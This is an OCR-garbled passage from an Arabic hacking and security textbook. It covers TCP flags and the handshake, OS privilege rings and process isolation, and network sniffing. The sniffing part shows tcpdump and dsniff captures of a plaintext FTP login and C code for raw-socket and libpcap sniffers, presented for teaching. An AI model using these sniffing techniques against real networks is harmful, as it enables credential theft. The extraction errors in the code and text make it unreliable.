وهذا شكل آخر يعرض بعض التفاصيل الخاصة field JL‏ المسمى «Code Bits‏ أو ال |S TCP Flags‏ نسميها: 


Source Port Destination Port 


سس |[ 


Acknowledgement Number 


۱ 2: m5: 


12 | 96 xis offset 777 0000000 oe ate 


1 
16 |128 Checksum URG Pointer 


(20 | 160 Options (Could be longer than 4 bytes) 
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سنقوم بتوضيح بعض ال Fields‏ المهمة في هذا ال :Header‏ 
اخترت لك أفضل تعريفات هذه ال Fields‏ من وجهة نظري» sa‏ تسميتها tal‏ بال Mechanisms‏ التى 


يستخدمها ال TCP‏ لتنفيذ عملية ال .Reliable Connection‏ 


Checksum: Used to detect bit errors in a transmitted packet. 


Timer: Used to timeout/retransmit a packet, possibly because 

the packet (or its ACK) was lost within the channel. 

Because timeouts can occur when a packet is delayed but not lost, 

or when a packet has been received by the receiver but the receiver-to-sender ACK has been lost, 
also when a duplicate copies of a packet may be received by a receiver. 


Sequence number: Used for sequential numbering of packets of data flowing from sender to 
receiver. 

Gaps in the sequence numbers of received packets allow the receiver to detect a 

lost packet. Packets with duplicate sequence numbers allow the receiver to detect 

duplicate copies of a packet. 


Acknowledgment: Used by the receiver to tell the sender that a packet or set of packets has been 
received correctly. 

Acknowledgments will typically carry the sequence number of the packet or packets being 
acknowledged. 


Negative acknowledgment: Used by the receiver to tell the sender that a packet has not been 
received correctly. Negative acknowledgments will typically carry the sequence number of the 
packet that was not received correctly. 
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Window: The sender may be restricted to sending only packets with sequence numbers that fall 
within a given range. 


By allowing multiple packets to be transmitted but not yet acknowledged, sender utilization can 
be increased over a stop-and-wait mode of operation. 


والآن وبعد أن تعرفنا على هذه ال Mechanisms‏ هيا لنتعرف على ال Field‏ الخاص بال Flags‏ عن قرب: 


TCP flag Meaning Purpose 

URG Urgent Identifies important data 

ACK Acknowledgment Acknowledges a packet; it is turned on for the majority of the 
connection 

PSH Push Tells the receiver to push the data through instead of buffering it 

RST Reset Resets a connection 

SYN Synchronize Synchronizes sequence numbers at the beginning of a connection 

FIN Finish Gracefully closes a connection when both sides say goodbye 


تقوم طبقة ال Transport‏ بعملية تصنيف سريع لل Segments‏ بالتدقيق على هذه ال Fields‏ وهي: 
ال Sequence number‏ و ال Ack number‏ و NS‏ نوع ال TCP Flag‏ الذي تحمله هذه ال .Segment‏ لاحظ أن 
كلا من ال Sequence‏ و ال Ack‏ عبارة عن bits‏ 32 


وما فائدة هذه ال "Sequence"‏ وال ”ACK7“..؟‏ 


"The sequence number and acknowledgment number are used to maintain state" 
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TCP Three-way Handshake 
لكي تتم عملية الاتصال بينك وبينه لابد أن يحدث إجراء یسمی‎ ch Server لنفرض أنك تود إنشاء إتصال ب‎ 


“Sequence and بالاشتراك مع ال‎ TCP Flags حيث نستخدم لأجله نوعين من ال‎ “Three-Way Handshake” 


.Ack numbers" 
یمکنك مراجعة دلالاتهم بالجدول في الصفحة السابقة.‎ “ACK و ال‎ SYN الستخدمة هي ال‎ TCP Flags ال‎ 


قمنا LA‏ بإراسل Segment‏ يحوي ال 


SYN ) من نوع‎ lel بها قيمة تشیر إلى‎ TCP Flag 


‘SYN‏ حیث يفهمها ال Server‏ ویرد 
علينا بإرسال SYN/ACK‏ يؤكد U‏ 


استلامه لل M SYN‏ رسلة. 


و 5 ) ACK‏ | 
ثم نرد عليه نحن ب isle ACK‏ نخطره y‏ 


باستلامنا لل SYN/ACK‏ التى أرسلها 


لناء وبعدها يبدأ الاتصال الفعلى بیننا وبینه. 


هيا لنقترب أكثر من عملية ال ..“Handshaking”‏ 


تأمل معي الشكل التالي: 
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SYN packet 

SYN on ACK off 
seq # = 324808530 
ack # = 0 


SYN/ACK packet 
Client SYN on ACK on 


seq # = 288666267 
ack # = 324808531 


ACK packet 

SYN off ACK on 
seq # = 324808531 
ack # = 288666268 


25 استخدام التوليفة التي تَكَلَّمنا عَنها!. 

واضح أن أي رسالة جديدة يتم UL, jl‏ لابد أن تحمل x) Sequence number‏ عنهاء فھنا عندما ied‏ تحن (Cilent)‏ 
بالبدء بالاتصال أرسلنا له segment‏ من نوع SYN‏ تحمل 30 sles Seq:‏ ال Server‏ بالرد علينا بإرسال ال 
SSYN/ACK‏ لاحظ آنها تعني أنه بريد أن خبرنا باستلامه هذه ال SYN‏ التي تحمل 30 Seq:‏ وبالتالي سيأخذ هذه ال 
Seq‏ ويقوم بعمل ”1 ."Increment by‏ سیّخرنا آنه استلمها OL‏ یو AS‏ استلامه! FUIS didi‏ بمعنی oib ACK‏ 


(31) وهو الرقم‎ “ACK = your Sequence number + 1” تمل‎ Segment UJ فسترسل‎ .!Seq ال‎ 
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وبالطبع با Segment lel‏ جديدة فلايد أن joe Sequence number nee:‏ عنها ك «IU. ID‏ سيكون رقم عشوائي 
حينها |S‏ يظهر بالشکل» وهو الرقم (67). 

والآن تُريد أن نؤكد لهُ استلامنا للرسال 255 Jus‏ له 1۳ + “ACK = His Sequence number‏ وهو الرقم )68( 
هذا الشكل يوضح UJ‏ ما يحدث بالعادلات: 


Client Server 


Allocate TCB 


Allocate TCB 


us ;‏ القول ob‏ فائدة ال geeks Sequence Number‏ فيا يل: 


"Sequence numbers allow TCP to put unordered packets back into order, to determine whether 
packets are missing, and to prevent mixing up packets from other connections". 
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إلى هنا نكون قد انتهينا من الطبقات الثلاث: 


Data-Link Layer 
Network Layer 
Transport Layer 


EES.‏ مُراجعة Appendix-B‏ في آخر الكتاب لعرفة المزيد عن أساليب انتقال ال Traffic‏ في الواقع العملي داخل 
شبكات ال «Data Centers‏ وأنو اع ال Architectures‏ المستخدّمّة. 
الاختراق» وبعض الآليات المتبعة للحاية منها. 
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Part III 
Security & Attacks 
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Introduction 


فيروس الإنفلونزا!»» 

هذا الفيروس العجیب. الذي لا يتركنا Lae gu WL‏ باستمرار!ء لديه قدرة متازة على تطوير نفسه ليقوم 
بإصابتنا مراراً وتكراراً!ء فهو يتغير مستخدماً طريقة تُسمى "Anti-Gen Drift”‏ حيث لا تتعرف عليه الأجسام 
المضادة التي تكونت في أجسامنا جراء الإصابة السابقة لنا به. 

وبالتالي فعلينا تجربة هذا ال Virus‏ بالتغيير الجديد الذي Lb‏ عليه كي يتسنى للجسم تحديث آجسامه المضادة ضده. 
ياله من Virus‏ لعين!. 

لا يأخذ هدنة» أو فترة راحة» يحب العمل باستمرار لتطوير نفسه ورفع كفائته» ما gÉ‏ شركات الأدوية على إجراء 


التحديثات الستمرة على منتجاتها المضادة للإنفلونزاء كي تواكب عمليات التطور لدى هذا ا لخصم e l‏ 


لدينا في عالم الكمبيوتر Ls‏ أعداء مثل ال .Viruses and Worms‏ 

e]‏ يسببون لنا الكثير من المتاعب والأضرار وضياع للملفات والبيانات. ولهذا ظهرت الحاجة SUL‏ لظهور أساليب 
الحاية باختلاف مستوياتها وأنواعهاء فقام Hackers‏ بدراسة هذه الآليات الأمنية وقاموا SV slew‏ عدة لإحداث 
الخروق cle‏ ونجحوا!.. 

فقام مُطورو الأنظمة الأمنية بتطوير منتجاتهم و آلياتهم لمجابهة هؤلاء الْتحایلین على أنظمتهم» وهكذا جرت هذه ال 


Cycle‏ إلى مالا خایة!. 
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ولكن هذه المشاكل التي تحدثها ال Crackers‏ و ال Malware Authors‏ وغيرهم.. سببت لنا بعض المنافع بالرغم من 


الأضرار التي عانينا منها بسببهم!. إنهم يجبروننا على التصدي لمم وإيجاد الحلول!. 
They Force a Response... Which fixes the problem!.‏ 


.Viktor Franki لصاحبه‎ “Man Search for Meaning" هذا بالكتاب‎ G35 
هذا الكتاب حيث قام بتأليفه في عام 1946 إلا أنه يحول 8,53 قويه» وهي:‎ eX بالرغم من‎ 


"لوللا وجود المعاناة.. لا أصبح للحياة معنی !". 


6 ؟؟.. هذا التاريخ gisi‏ بقصة "نيلسون مانديلا"!ء فقد انتقل إلى "آورلاندو" في هذا العام لتبدأ رحلة معاناته 
من أجل الخرية» مروراً , بسجنه لسبع و عشرين chle‏ ثم في النهاية فوزه في الانتخابات ليتحقق Ald‏ وخلم شعبه 
ok AL‏ ..فانتشار الظّلم والقهر GE‏ من مانديلا مناضلاً ومُكافحاًء CIEE‏ هذه المعاناة العنی لحياته ولحياة مَن 


\ 


\ 


MAL وصَدّق الذى قال "أنت تمتلك من الكرامة بقدر ما تمتلك من‎ Axa LSU 


ونحن ا Y J‏ وجود هؤلاء ال Crackers‏ و ال Malware Authors‏ وغيرهم من sols‏ 
U‏ ظهرت UJ‏ الحاجة إلى ال "Security"‏ بکل UIC‏ و آنواعها.. 
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Computer Security 


تكلمنا في الباب الأول عن البرامج التي يتم كتابتها ثم عمل Compile‏ ها ومن ثم تشغيلها على ال ۰0.5 بمعنى Lal‏ 
کنا p‏ صلاحيات لهذا البرنامج بالتعامل مع ال Resources‏ المختلفة لهذا ال ols O.S‏ يتعامل - ال Memory‏ أو 
يقوم بفتح file descriptors‏ أو إنشاء Sockets‏ وغيرها من الهام Lal‏ كان يتعامل مع ال Hardware‏ الخاصة 
بالكمبيوتر إذا تطلب الأمر. 

كنا أثناء هذه المرحلة نقوم بتسليط الضوء على ال Applications‏ نفسها!ء كي نفهم كيف كانت تقوم بتنفيذ دورها. 
لكننا liis OY‏ بتسليط الضوء على ال clani Operating System‏ لنرى فلسفته في التعامل مع هذه ال 
Applications‏ و ال .Users‏ 

فهذا يُعد مثالاً جيداً لنفهم به أساسيات الأمن والماية. 


“Protection Mechanisms" نفسه أثناء تشغيله بال‎ Gul غل الأساليت التى يستخدمها الكمبيوتر في‎ s 


هذه ال Mechanisms‏ تنقسم إلى ثلاثة أنواع رئيسية هي: 


= Rings 
= Operational States 
= Security Modes 


سنتكلم عن ال Mechanisms‏ الأولى والثانية: 
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Rings 


Ring 0: OS Kernel/Memory (Resident Components) 
Ring 1: Other OS Components 

Ring 2: Drivers, Protocols, etc. 

Ring 3: User-Level Programs and Applications 


Rings 0- 2 run in supervisory or ا‎ mode. 
Ring 3 runs in user mode. ۱ 


يقو e‏ هذا ال Architecture‏ بعمل organize‏ 
e‏ ال Applications‏ أو ال utilities‏ أو 
أي شيء يعمل تحت سيطرة نظام التشغيل 
هذاء "Under the control of this O.S”‏ 
يقوم هذا ال Architecture‏ بتر تيبهم داخل 
5 تفصل بینها حواجز كي us‏ من 
العبور بين هذه ال Rings‏ كما نراهم في 
الشکل. 

فكلا اتجهنا آکثر إلى الداخل في ال Ring‏ 
US‏ حصلنا على صلاحیات del‏ وأکبر. 


يظهر أن ال ”0 "Ring‏ هي الأعلى à‏ 
الصلاحیات» حيث $a;‏ لل Processes‏ 
التي تمتلك صلاحيات هذه ال Ring‏ أن تقوم 
بعمل Access‏ لأي Resources‏ اكالتعامل 


مع ال «CPU‏ أو التعامل مع ال Memory‏ بكل خرية. 
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يتواجد في هذه ال Ring‏ ال lips “O.S Kernel"‏ يعد ال “Most Trusted"‏ بالنسبة J‏ ال Computer‏ 


.Memory كال‎ physical hardware يتمكن من التعامّل بشكل مباشر مع ال‎ a «Hardware 


Gb‏ إلى ال 1 :Ring‏ هنا تقع بقية ال Operations‏ العادية التي يقوم مها ال 0.5 Lass‏ ال Tasks‏ المختلفة أو عمل 


.Processes Switching between 


سأعطيك مثال عليها: 

عندما أقوم بفتح ملف essi, word‏ فيه بعض الأسطرء ثم أتركة ei: Zr‏ ال Browser‏ لأتصفح الانترنت. 
وعندما أنتهي من التصفح سأعود مرة أخرى إلى ملف ال Word‏ يقوم حينها ال O.S‏ بعمل "Context Switch”‏ 
حيث كان قد eG‏ بحفظ ال process‏ الخاصة بال Word‏ عند آخر وضع كانت عليه قبل عملية الانتقال إلى ال 


.Browser‏ لیقوم بالعودة إلبها مرةٌ آحری. 


ننتقل إلى ال 2 :Ring‏ 
(em doo‏ إلى حد ما Privileged‏ حيث يتواجد ما ال Input/Out Put Drivers‏ و ال “SS P system utilities‏ 
حيث هى أشبه Special Files JU‏ والتي لا يمكن للبرامج أو ال Apps‏ عمل Access‏ إليها دون الاستعانة 


بصلاحيات هذه ال .Ring‏ 
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Understanding Hacking and Information Security aslagleall alg القرصنة الإلكترونية‎ 


ror‏ ال 3 Ring‏ .. وهنا تقع ال Applications‏ والبرامج بأنواعهاء 
هذه هي البيئة الخاصة بال User‏ حيث لا یمکته إحداث أي خرق في 
النظام لعدم وجود الصلاحيات العليا لديه!. 

هذا الشكل يوضح ال Kernel‏ الذي يقع في ال "0 "Ring‏ 

حيث foley‏ بشكل مباشر مع ال |S Hardware‏ يظهر. ولا يتم السیاح 
لل Applications‏ بالتعامل بشکل مباشر مع ال Nas «Hardware‏ من 


ذلك يتم إرسال طلب إلى ال Kernel‏ وهو يقرر ما إذا سيتم السماح أم لا وفقاً لاعتبارات عدة. 


Operational States 


نعني مها Lai‏ ال “Process States"‏ 
هناك تصنيف لل Process‏ من حيث ال Process Modes‏ فهي اما أن تکون d‏ نظام ال (User Mode)‏ حیث تکون 
الصلاحيات مُنخفضة. “Low Privileges”‏ واما أن تكون في نظام ال (Privileged Mode)‏ حيث تمتلك 
صَلاحيات System JI‏ هيا لنتعرّف على ال States‏ التتي مرا أي Process‏ 3 أن تبدأ وحتى أن تنتهي من عملها. 
Su‏ عندما نقوم بفتح Application‏ صغیر» سيقوم بفتح Process‏ خاصة به وهي التي نراها في ال Process‏ 
ois «manager‏ ال process‏ وغيرها يستطيع ال 0.5 التعامل معهم في نفس الوقت. والتبدیل بینهم» وانهاء مایرید 
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:Process مها هذه ال‎ P الحالات التى‎ RET Cm 


Process needs another ©) Stopped 


New processes time slice 


When process finishes, 


or terminates 
©) Running 


Block for 1/0, 
resources 


If CPU is available 


Ready 
Unblocked 


O 


Waiting 


Ready: The process is ready to resume or begin processing as soon as it is scheduled for 
execution. If the CPU is available when the process reaches this state, it will transition directly 
into the running state. 


Waiting: “waiting for a resource", the process is ready for continued execution but is waiting for 
a device or access request. 

Running: the process here executes on the CPU and keeps going until it finishes, or it blocks for 
some reason. 


Stopped When a process finishes or must be terminated (because an error occurs, a required 
resource is not available, or a resource request can’t be met), it goes into a stopped state. 


Security & Attacks 
[181] 


كا رأيناء يقوم Operating System Jl‏ باستخدام هذه ال Mechanisms‏ لىاية نفسه من البيئة المحيطة ca‏ والواقعة 
دا في ال )3 (Ring‏ وني الحقيقة (glo‏ ما يتعامل نظام التشغيل مع ال Applications‏ والبرامج بأنواعها بأسلوب 
وحيد» يتلخص في هذه العبارة: 


“Software is Not Trusted!” 


Technical Mechanisms 


سنتكلم عن بعض ال Technical Mechanisms‏ التى تؤخذ في الاعتبار عند تصميم «Operating System l‏ 


حيث ستوضح لنا كيف يتعامل نظام التشغيل مع البيئة المحيطة به. ومن بعض هذه الآليات مايلي: 
Layering, Abstraction, Data Hiding, and Process Isolation‏ 
سنتناوهم بالترتيب: 


Layering 
فهو ينص على وضع الهام وال‎ «x86 Architecture العمول به في ال‎ Rings ال‎ Jad مشابه‎ Concept هذا ال‎ 


Functions‏ 444.41 و reel‏ في ال e (Low Layers)‏ الاقل i^‏ في ال «(Upper Layers)‏ وهکذا.. یمکن 
التواصل بين هذه ال Layers‏ عبر i4 "interfaces"‏ لكى نتمكن من فرض شروط التواصل هذا!. Layer J‏ 
محمية من التلاعب من أي Layers‏ آخری. 


Each layer is protected from tampering by any other layer, Also outer layers cannot violate or 
override any security policy enforced by an inner layer. 
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Abstraction 
بعض الثىء..‎ “Black Boxing” هذا ال 0 يثبه مفهوم ال‎ 


* Black Box وماهذا ال‎ 

as‏ هذا المصطلح على ال Device‏ أو ال System‏ أو ال Object‏ الذي يستقبل منك inputs‏ ويقوم بإخراج 
«Outputs‏ ولا بطلعك على العمليات التي حدثت فيا بينهم!. 

فلو جثنا dai‏ على ال 0.5 فثلاحظ أن نظام تشغيل مثل الويندوزء لا SS‏ على التفاصيل التي تحدث عندما 
تقوم بفتح برنامج ال Word‏ مثلا ويكتفي بإظهار صورة صغيرة لك ley‏ هو في ال Back Ground‏ يقوم بعمل 
الإعدادات اللازمة لفتح البرنامج لك. 


الشکل یوضح مفهوم ال :Black Boxing‏ 


Blackbox 


Stimulus Response 


في عمليات ال Access Controls‏ على سبيل Ya «JUI‏ من الانشغال بإعطاء الصلاحيات المناسبة لكل User‏ 
ويسم هنا ..“Subject”‏ يكون التركيز على ال "y Objects‏ عن ذلك. بمعنى أننا نقوم بإنشاء "Groups‏ ثم 


نعطى الصلاحيات لكل «eg group‏ فیتم تصنیف ال 5 عبر توزيعهم على هذه ال -groups‏ 
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وبمجرد أن ينتمى ال user‏ إلى ال group‏ المناسب ca‏ سيمتلك صلاحيات هذا ال group‏ هذا الأمر يظهر فائدته عند 


التعامل مع مستخدمين کثر وبصلاحیات متفاوتة. 


Data Hiding 
Security Level للبيانات عن طريق منحها‎ All فهي توفر نوع من‎ UL Layering مفهوم ال‎ TP CENTS 
من كَشْف هذه البيانات.‎ oS ey آخری مختلفة‎ Security Level مُعينة» وبالتالي أي 9 تنتمى إلى‎ 


It ensures that data existing at one level of security is not visible to processes running at different 
security levels. 


Process Isolation 
التي تقع نحت سيطرته.‎ resources نفسه وجميع ال‎ UA 0.5 هذه الخاصية من آهم الخصائص التي يستخدمها ال‎ 
أو ال‎ Applications إلى مساحات معزولة عن بعضهاء ویتم السیاح للبرامج أو ال‎ memory ال‎ eM فيتم هنا‎ 
على احتياجاتها.‎ £s obe Ll التي تعمل على هذا ال 0.5 باستخدام هذه‎ utilites 
process أي‎ C وذلك‎ il بحيث لا تطغى أي 95 على‎ processes ويقوم نظام التشغيل بحاية هذه ال‎ 
Mi aas ليست‎ memory داخل ال‎ lus لاي‎ access من ماولة عمل‎ 


Requires that the operating system provide separate memory spaces for each process's 
instructions and data. It also requires that the operating system enforce those boundaries, 
preventing one process from reading or writing data that belongs to another process. 
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إلى هنا نكون انتهينا من الحديث عن بعض الأساسيات المتعلقة بال "Computer Security"‏ 

سننتقل إلى موضوع جديد.. 

یت نقوم بتحلیل ودراسة بعض آنواع igli (zal‏ كال Buffer Overflow‏ وغيرها.. تأكد من استيعابك 
لأساسيات البرمجة التي شرحناها في الباب الأولء وأمثلة الشبکات التي تناولناها في الباب الثاني كي َضمَن لك الفهم 


امد للفقرات القادمة OSL‏ الله.. 
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Network Sniffing 


ads‏ على هذا البرنامج الصغيرالذي يقوم بعمل Intercept‏ لل Traffic‏ المار خلال شبكة ما وعمل Log‏ لهذا ال 


“Network Sniffer” JL Traffic 


یقوم برنامج مثل ال tcpdump‏ بوضع کارت الشبکة لديك على وضع “Promiscuous Mode”‏ هذا ال mode‏ 


."packet-capturing" من القيام بعملية ال‎ ne e 


هذه gts‏ ال tepdump‏ والتي تظهر التقاط الحساب الخاص بال FTP‏ 


reader@hacking:~/booksrce $ sudo tcpdump -1 -X 'ip host 192.168.0.118' 
tcpdump: listening on 0 

21:27:44.684964 192.168.0.118.ftp » 192.168.0.193.32778: P 1:42(41) ack 1 win 
17316 <nop,nop,timestamp 466808 920202» (DF) 


0x0000 4500 005d e065 4000 8006 97ad c0a8 0076 Bu] SOO V 
0x0010 c0a8 0061 0015 800a 292e 8a73 5ed4 9ce8 ........ Jaw ws 
0x0020 8018 43a4 a12f 0000 0101 080a 0007 8 rem لم ا‎ sere x 
0x0030 000e 0a8a 3232 3020 5459 5053 6f66 7420 nove 2204 TYBSORE. 


0x0040 4654 5020 5365 7276 6572 2030 2e39 392e FTP.Server.0.99. 

0x0050 3133 13 

21:27:44.685132 192.168.0.193.32778 » 192.168.0.118.ftp: . ack 42 win 5840 
«nop,nop,timestamp 920662 466808» (DF) [tos 0x10] 


0x0000 4510 0034 966۶ 4000 4006 21bd c0a8 00c1 Be A OC 40. rin 
0x0010 c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c لاه‎ A ue وی‎ e 
0x0020 8010 16d0 81db 0000 0101 080a 000e 0c56 ............... V 


0x0030 0007 1£78 ...x 

21:27:52.406177 192.168.0.193.32778 » 192.168.0.118.ftp: P 1:13(12) ack 42 
win 

5840 «nop,nop,timestamp 921434 466808» (DF) [tos 0x10] 


0x0000 4510 0040 9670 4000 4006 210 c0a8 00c1 E..0.p80.Q.!..... 
0x0010 c0a8 0076 800a 0015 5ed4 9ce8 292e 8a9c secs V مرها‎ TE 
0x0020 8018 16d0 edd9 0000 0101 080a 000e 0f5a ............... Z 
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0x0030 0007 1278 5553 4552 206c 6565 6368 0d0a ...XUSER.leech.. 
21:27:52.415487 192.168.0.118.ftp » 192.168.0.193.32778: P 42:76(34) ack 13 
win 17304 «nop,nop,timestamp 466885 921434» (DF) 


0x0000 4500 0056 eOac 4000 8006 976d c0a8 0076 Ees Ver ERY 
0x0010 c0a8 00c1 0015 800a 292e 8a9c 5ed4 9cf4 ........ a e 
0x0020 8018 4398 4e2c 0000 0101 080a 0007 1fc5 sce CN pase m soe ec e 
0x0030 000e 0f5a 3333 3120 5061 7373 776£ 7264 ...Z2331.Password 
0x0040 2072 6571 7569 7265 6420 666f 7220 6c65 .required.for.le 


0x0050 6563 ec 
21:27:52.415832 192.168.0.193.32778 » 192.168.0.118.ftp: . ack 76 win 5840 
<nop,nop,timestamp 921435 466885» (DF) [tos 0x10] 


0x0000 4510 0034 9671 4000 4006 21bb 1 E..4.q8.80.1..... 
0x0010 c0a8 0076 800a 0015 5ed4 9cf4 292e 8abe sd Vias 5.5 re sS 
0x0020 8010 16d0 7e5b 0000 0101 080a 000e 55 tO sued ettet xs [ 


0x0030 0007 1fc5 
21:27:56.155458 192.168.0.193.32778 » 192.168.0.118.ftp: P 13:27(14) ack 76 
win 5840 «nop,nop,timestamp 921809 466885» (DF) [tos 0x10] 


0x0000 4510 0042 9672 4000 4006 21ac c0a8 1 Bre) Bi ما مها‎ a 
0x0010 c0a8 0076 800a 0015 5ed4 9cf4 292e 8abe vest PI std is 
0x0020 8018 16d0 90b5 0000 0101 080a 000e 1001 ................ 
0x0030 0007 1fc5 5041 5353 206c 3840 6e69 7465 ....PASS.18@nite 


0x0040 0003 .. 
21:27:56.179427 192.168.0.118.ftp » 192.168.0.193.32778: P 76:103(27) ack 27 
win 17290 «nop,nop,timestamp 466923 921809» (DF) 


0x0000 4500 004f eOcc 4000 8006 9754 c0a8 0076 Five O16 رو گر مه گنه‎ 
0260010 c0a8 0061 0015 800a 2926 8206 56۵04 9002 ^........ | ere ager E 
226 0x400 

0x0020 8018 438a 4c8c 0000 0101 080a 0007 8 E ل‎ E 
0x0030 000e 1001 3233 3020 5573 6572 206c 6565 Qesx230.User.lee 


0x0040 6368 206c 6f67 6765 6420 696e 2e0d 0a ch.logged.in... 


لقد تم التقاط حساب الُستخدم الخاص بال FTP‏ أثناء اتصاله بال PIP Server‏ فک تعلم أن البيانات التي يتم 
UL)‏ عبر الشبكة باستخدام بروتوكول ال FTP‏ أو ال Telnet‏ تكون .Unencrypted‏ 
وهذا توضيح لنقطة الضعف هذه: 


Using FTP both the command and data channels are unencrypted. Any data sent over these 
channels can be intercepted and read. One common exploit that takes advantage of this particular 
vulnerability is the man-in-the-middle attack using ARP poisoning and a packet sniffer. 
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بالطبع إذا استخدم السيد "Leech"‏ هنا بروتوكول ال ERE FTPS‏ ال FTP‏ لن تظهر ال OY Session‏ ال FTPS‏ 

پستخدم ال SSL‏ في تشفير عملية ال -Login‏ و NX JL‏ من استخدام ال Telnet‏ يفضل استخدام ال SSH‏ لتحقیق 

الإتصال الآمن. 

ُوجد أدوات أكثر تفصيلاً من ال tepdump‏ تقوم بالتقاط حسابات الْستّخدمین بشكل مُباشر مثل ال sniff‏ 
Dsniff:‏ 


reader@hacking:~/booksre $ sudo dsniff -n 
dsniff: listening on 0 


12/10/02 21:43:21 tcp 192.168.0.193.32782 => 192.168.0.118.21 (ftp) 
USER leech 
PASS 18@nite 


Building Our Sniffer! 


والآن سنتعرف عن قرب كيف تعمل برامج ال Network Sniffing‏ المختلفة. 


تعال GU‏ نظرة على ما يقولة هذا الرجُل: 
Packet sniffers can be coded by either using sockets api provided by the kernel, or by using some‏ 


packet capture library like libpcap. 


Basic Sniffer using sockets 
To code a very simply sniffer in C the steps would be: 


1. Create a raw socket. 
2. Put it in a recvfrom loop and receive data on it. 


A raw socket when put in recvfrom loop receives all incoming packets. This is because it is not 
bound to a particular address or port. 
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SOCk raw = socket (AF INET , SOCK RAW , IPPROTO TCP); 

while(1) 

1 

data size - recvfrom(sock raw , buffer , 65536 , 0 , &saddr , &saddr size); 


} 
That’s all. The buffer will hold the data sniffed or picked up. The sniffing part is actually 


complete over here. The next task is to actually read the captured packet, analyze it and present it 
to the user in a readable format. 


يريد هذا الرجل أن gers‏ أنه سيستخدم ال Row Socket‏ لیکشف من خلاله ما يحدث داخل ال ‘OSI Layers‏ وکا 
يظهر في الكود فقد حدد نوع ال Protocol Family‏ ب ۰1۳۷4 واختار نوع ال Socket‏ ليكون ‘Row Socket‏ ثم 
حدد أنه بريد مراقبة بروتوكول ال .TCP‏ ثم استخدم ال ) recvfrom(‏ والتي تستقبل ال Arguments‏ التي تراها 
بالأعلى» استخدمها كي يقوم بعمل Capture‏ لل traffic‏ الار e‏ كارت الشبكة وتخزینه في ال buffer‏ ولكي يكتول 
هذا ال Sniffer‏ الرائع» of Xy‏ نُستخدم ss) function‏ 553 3565 هذه ال data‏ 

أليس al LUIS‏ سنستخدم؟.. 


سنستخیم ال dump()‏ التي شرحناها في الفصل السابق!. EKE‏ مُراجعتها كي تتذکر آلية عملها. 


هيا لنشاهد هذا ال Sniffer‏ بعد إدخال ال ( Dump(‏ عليه: 


#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <sys/socket.h> 
#include <netinet/in.h> 
#include <arpa/inet.h> 
#include "error.h" 
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int main(void) { 

int i, recv length, sockfd; 

u_char buffer[9000]; 

if ((sockfd = socket (PF INET, SOCK RAW, IPPROTO TCP)) == -1) 
fatal("in socket"); 

for(i20; i > 3; itt) { 
recv length - recv(sockfd, buffer, 8000, 0); 
printf ("Got a %d byte packetin", recv length); 
dump (buffer, recv length); 


هذا الكود يقوم بفتح row socket‏ من نوع ‘TCP‏ ويقوم بعمل capture‏ لعدد |S (3 Packets)‏ يبدو داخل دالة ال 
.For( )‏ 
ثم يقوم بطباعة ال row data‏ الخاصة بكل packet‏ باستخدام ال ( dump(‏ لاحظ أننا في البداية buffer si LSE‏ 


"unsigned char" نوعه‎ 0347 5 


ولماذا اخترنا “unsigned char"‏ بالذات؟ 


..binary data فهي تتعامل بشكل جيد مع ال‎ network programming J! أفضل صيغة تستخدم في‎ le 


Sis J^‏ برنامج "the Server"‏ الذي تحدثنا عنه في CUI‏ الثانی؟. 
سنقوم بإرسال بعض ال texts‏ ذا ال server‏ وات كيف سيقوم ال sniffer‏ بعمل capture‏ لهذا ال text‏ الذي 
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هذه نتائج تشغيل ال Sniffer‏ أثناء فتح Session‏ مع ال ‘Server‏ 


reader@hacking:~/booksrc $ sudo ./raw tcpsniff 
Got a 68 byte packet 
45 10 00 44 le 36 40 00 40 06 46 23 c0 a8 2a 01 | E..D.680.Q.F4..*. 


c0 a8 2a ۶9 8b 12 le 02 ac 14 cf 92 e5 10 6c 9 ce ed eques alee 
80 18 05 b4 32 47 00 00 01 01 08 Oa 26 ab 9a 1 bite 2 GS Pek Ss, G&G... 
02 3b 65 b7 74 68 69 73 20 69 73 20 61 20 74 65 .;e.this is a t 
73 74 0d Oa SU 


Got a 70 byte packet 
45 10 00 46 1e 37 40 00 40 06 46 20 c0 a8 2a 01 Ex EST IE 47. 


c0 a8 2a f9 8b 12 le d2 ac 14 cf a2 e5 10 6c 9 ag S E pcs ues l4 
80 18 05 b4 27 95000001 01 08 0a 26 ab a0 75 — m &..u 
02 3c 1۳0 28 41 41 41 41 41 41 41 41 41 41 41 421 .X. (AAAAAAAAAAAA 
41 41 41 41 Od Oa AAAA.. 


Got a 71 byte packet 
45 10 00 47 le 38 40 00 40 06 46 le c0 a8 2a 01 E..G.880.Q.F...*. 


c0 a8 2a ۶9 8b 12 le 02 ac 14 cf b4 e5 10 6c 9 c EPI l« 
80 18 05 b4 68 45 00 00 01 01 08 Oa 26 ab b6 7 SURE. LA PEE 
02 3c 20 ad 66 6a 73 64 61 6c 6b 66 6a 61 73 6b .< .fjsdalkfjask 
66 6a 61 73 64 Od Oa fjasd.. 


reader@hacking:~/booksre 5 


A 


a a والآن‎ «row socket باستخدام ال‎ sniffing لقد قمنا بتجربة ال‎ ASCII JL (A) تعني‎ (0x41) al تذكر‎ 


استخدام ال 7JI  clibpcap library‏ | يستخدمها ال tepdump‏ و ال „dsniff‏ 


libpcap Sniffer 


مایل تعریف هذه ال Lib‏ 


The Packet Capture library provides a high level interface to packet capture systems. All packets 
on the network, even those destined for other hosts, are accessible through this mechanism. It 
also supports saving captured packets to a “savefile”, and reading packets from a “savefile”. 
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قام بكتابتها BW‏ مُطوّرون ینتمون إلى جامعة كاليفورنياء بريكلي.. pI SE‏ © 
سنقوم باستخدام ال functions‏ الخاصة مبذه ال Lib‏ 


#include <pcap.h> 
#include "error.h" 


void pcap fatal(const char *failed in, const char *errbuf) { 
printf("Fatal Error in $s: %s\n", failed in, errbuf); 
exit(1); 


) 


int main() 4 
struct pcap pkthdr header; 
const u char *packet; 
char errbuf[PCAP ERRBUF SIZE]; 
char *device; 
pcap t *pcap handle; 
qt 3 


device = pcap lookupdev (errbuf); 
if (device == NULL) 
pcap fatal ("pcap lookupdev", errbuf); 


printf("Sniffing on device %s\n", device); 


pcap handle - pcap open live(device, 4096, 1, 0, errbuf); 
if(pcap handle -- NULL) 
pcap fatal("pcap open live", errbuf); 


for(i-0$ a < Beats) 4 
packet = pcap next(pcap handle, &header) ۶ 
printf ("Got a 50 byte packet\n", header.len); 
dump (packet, header.len); 
} 
pcap close(pcap handle); 


) 
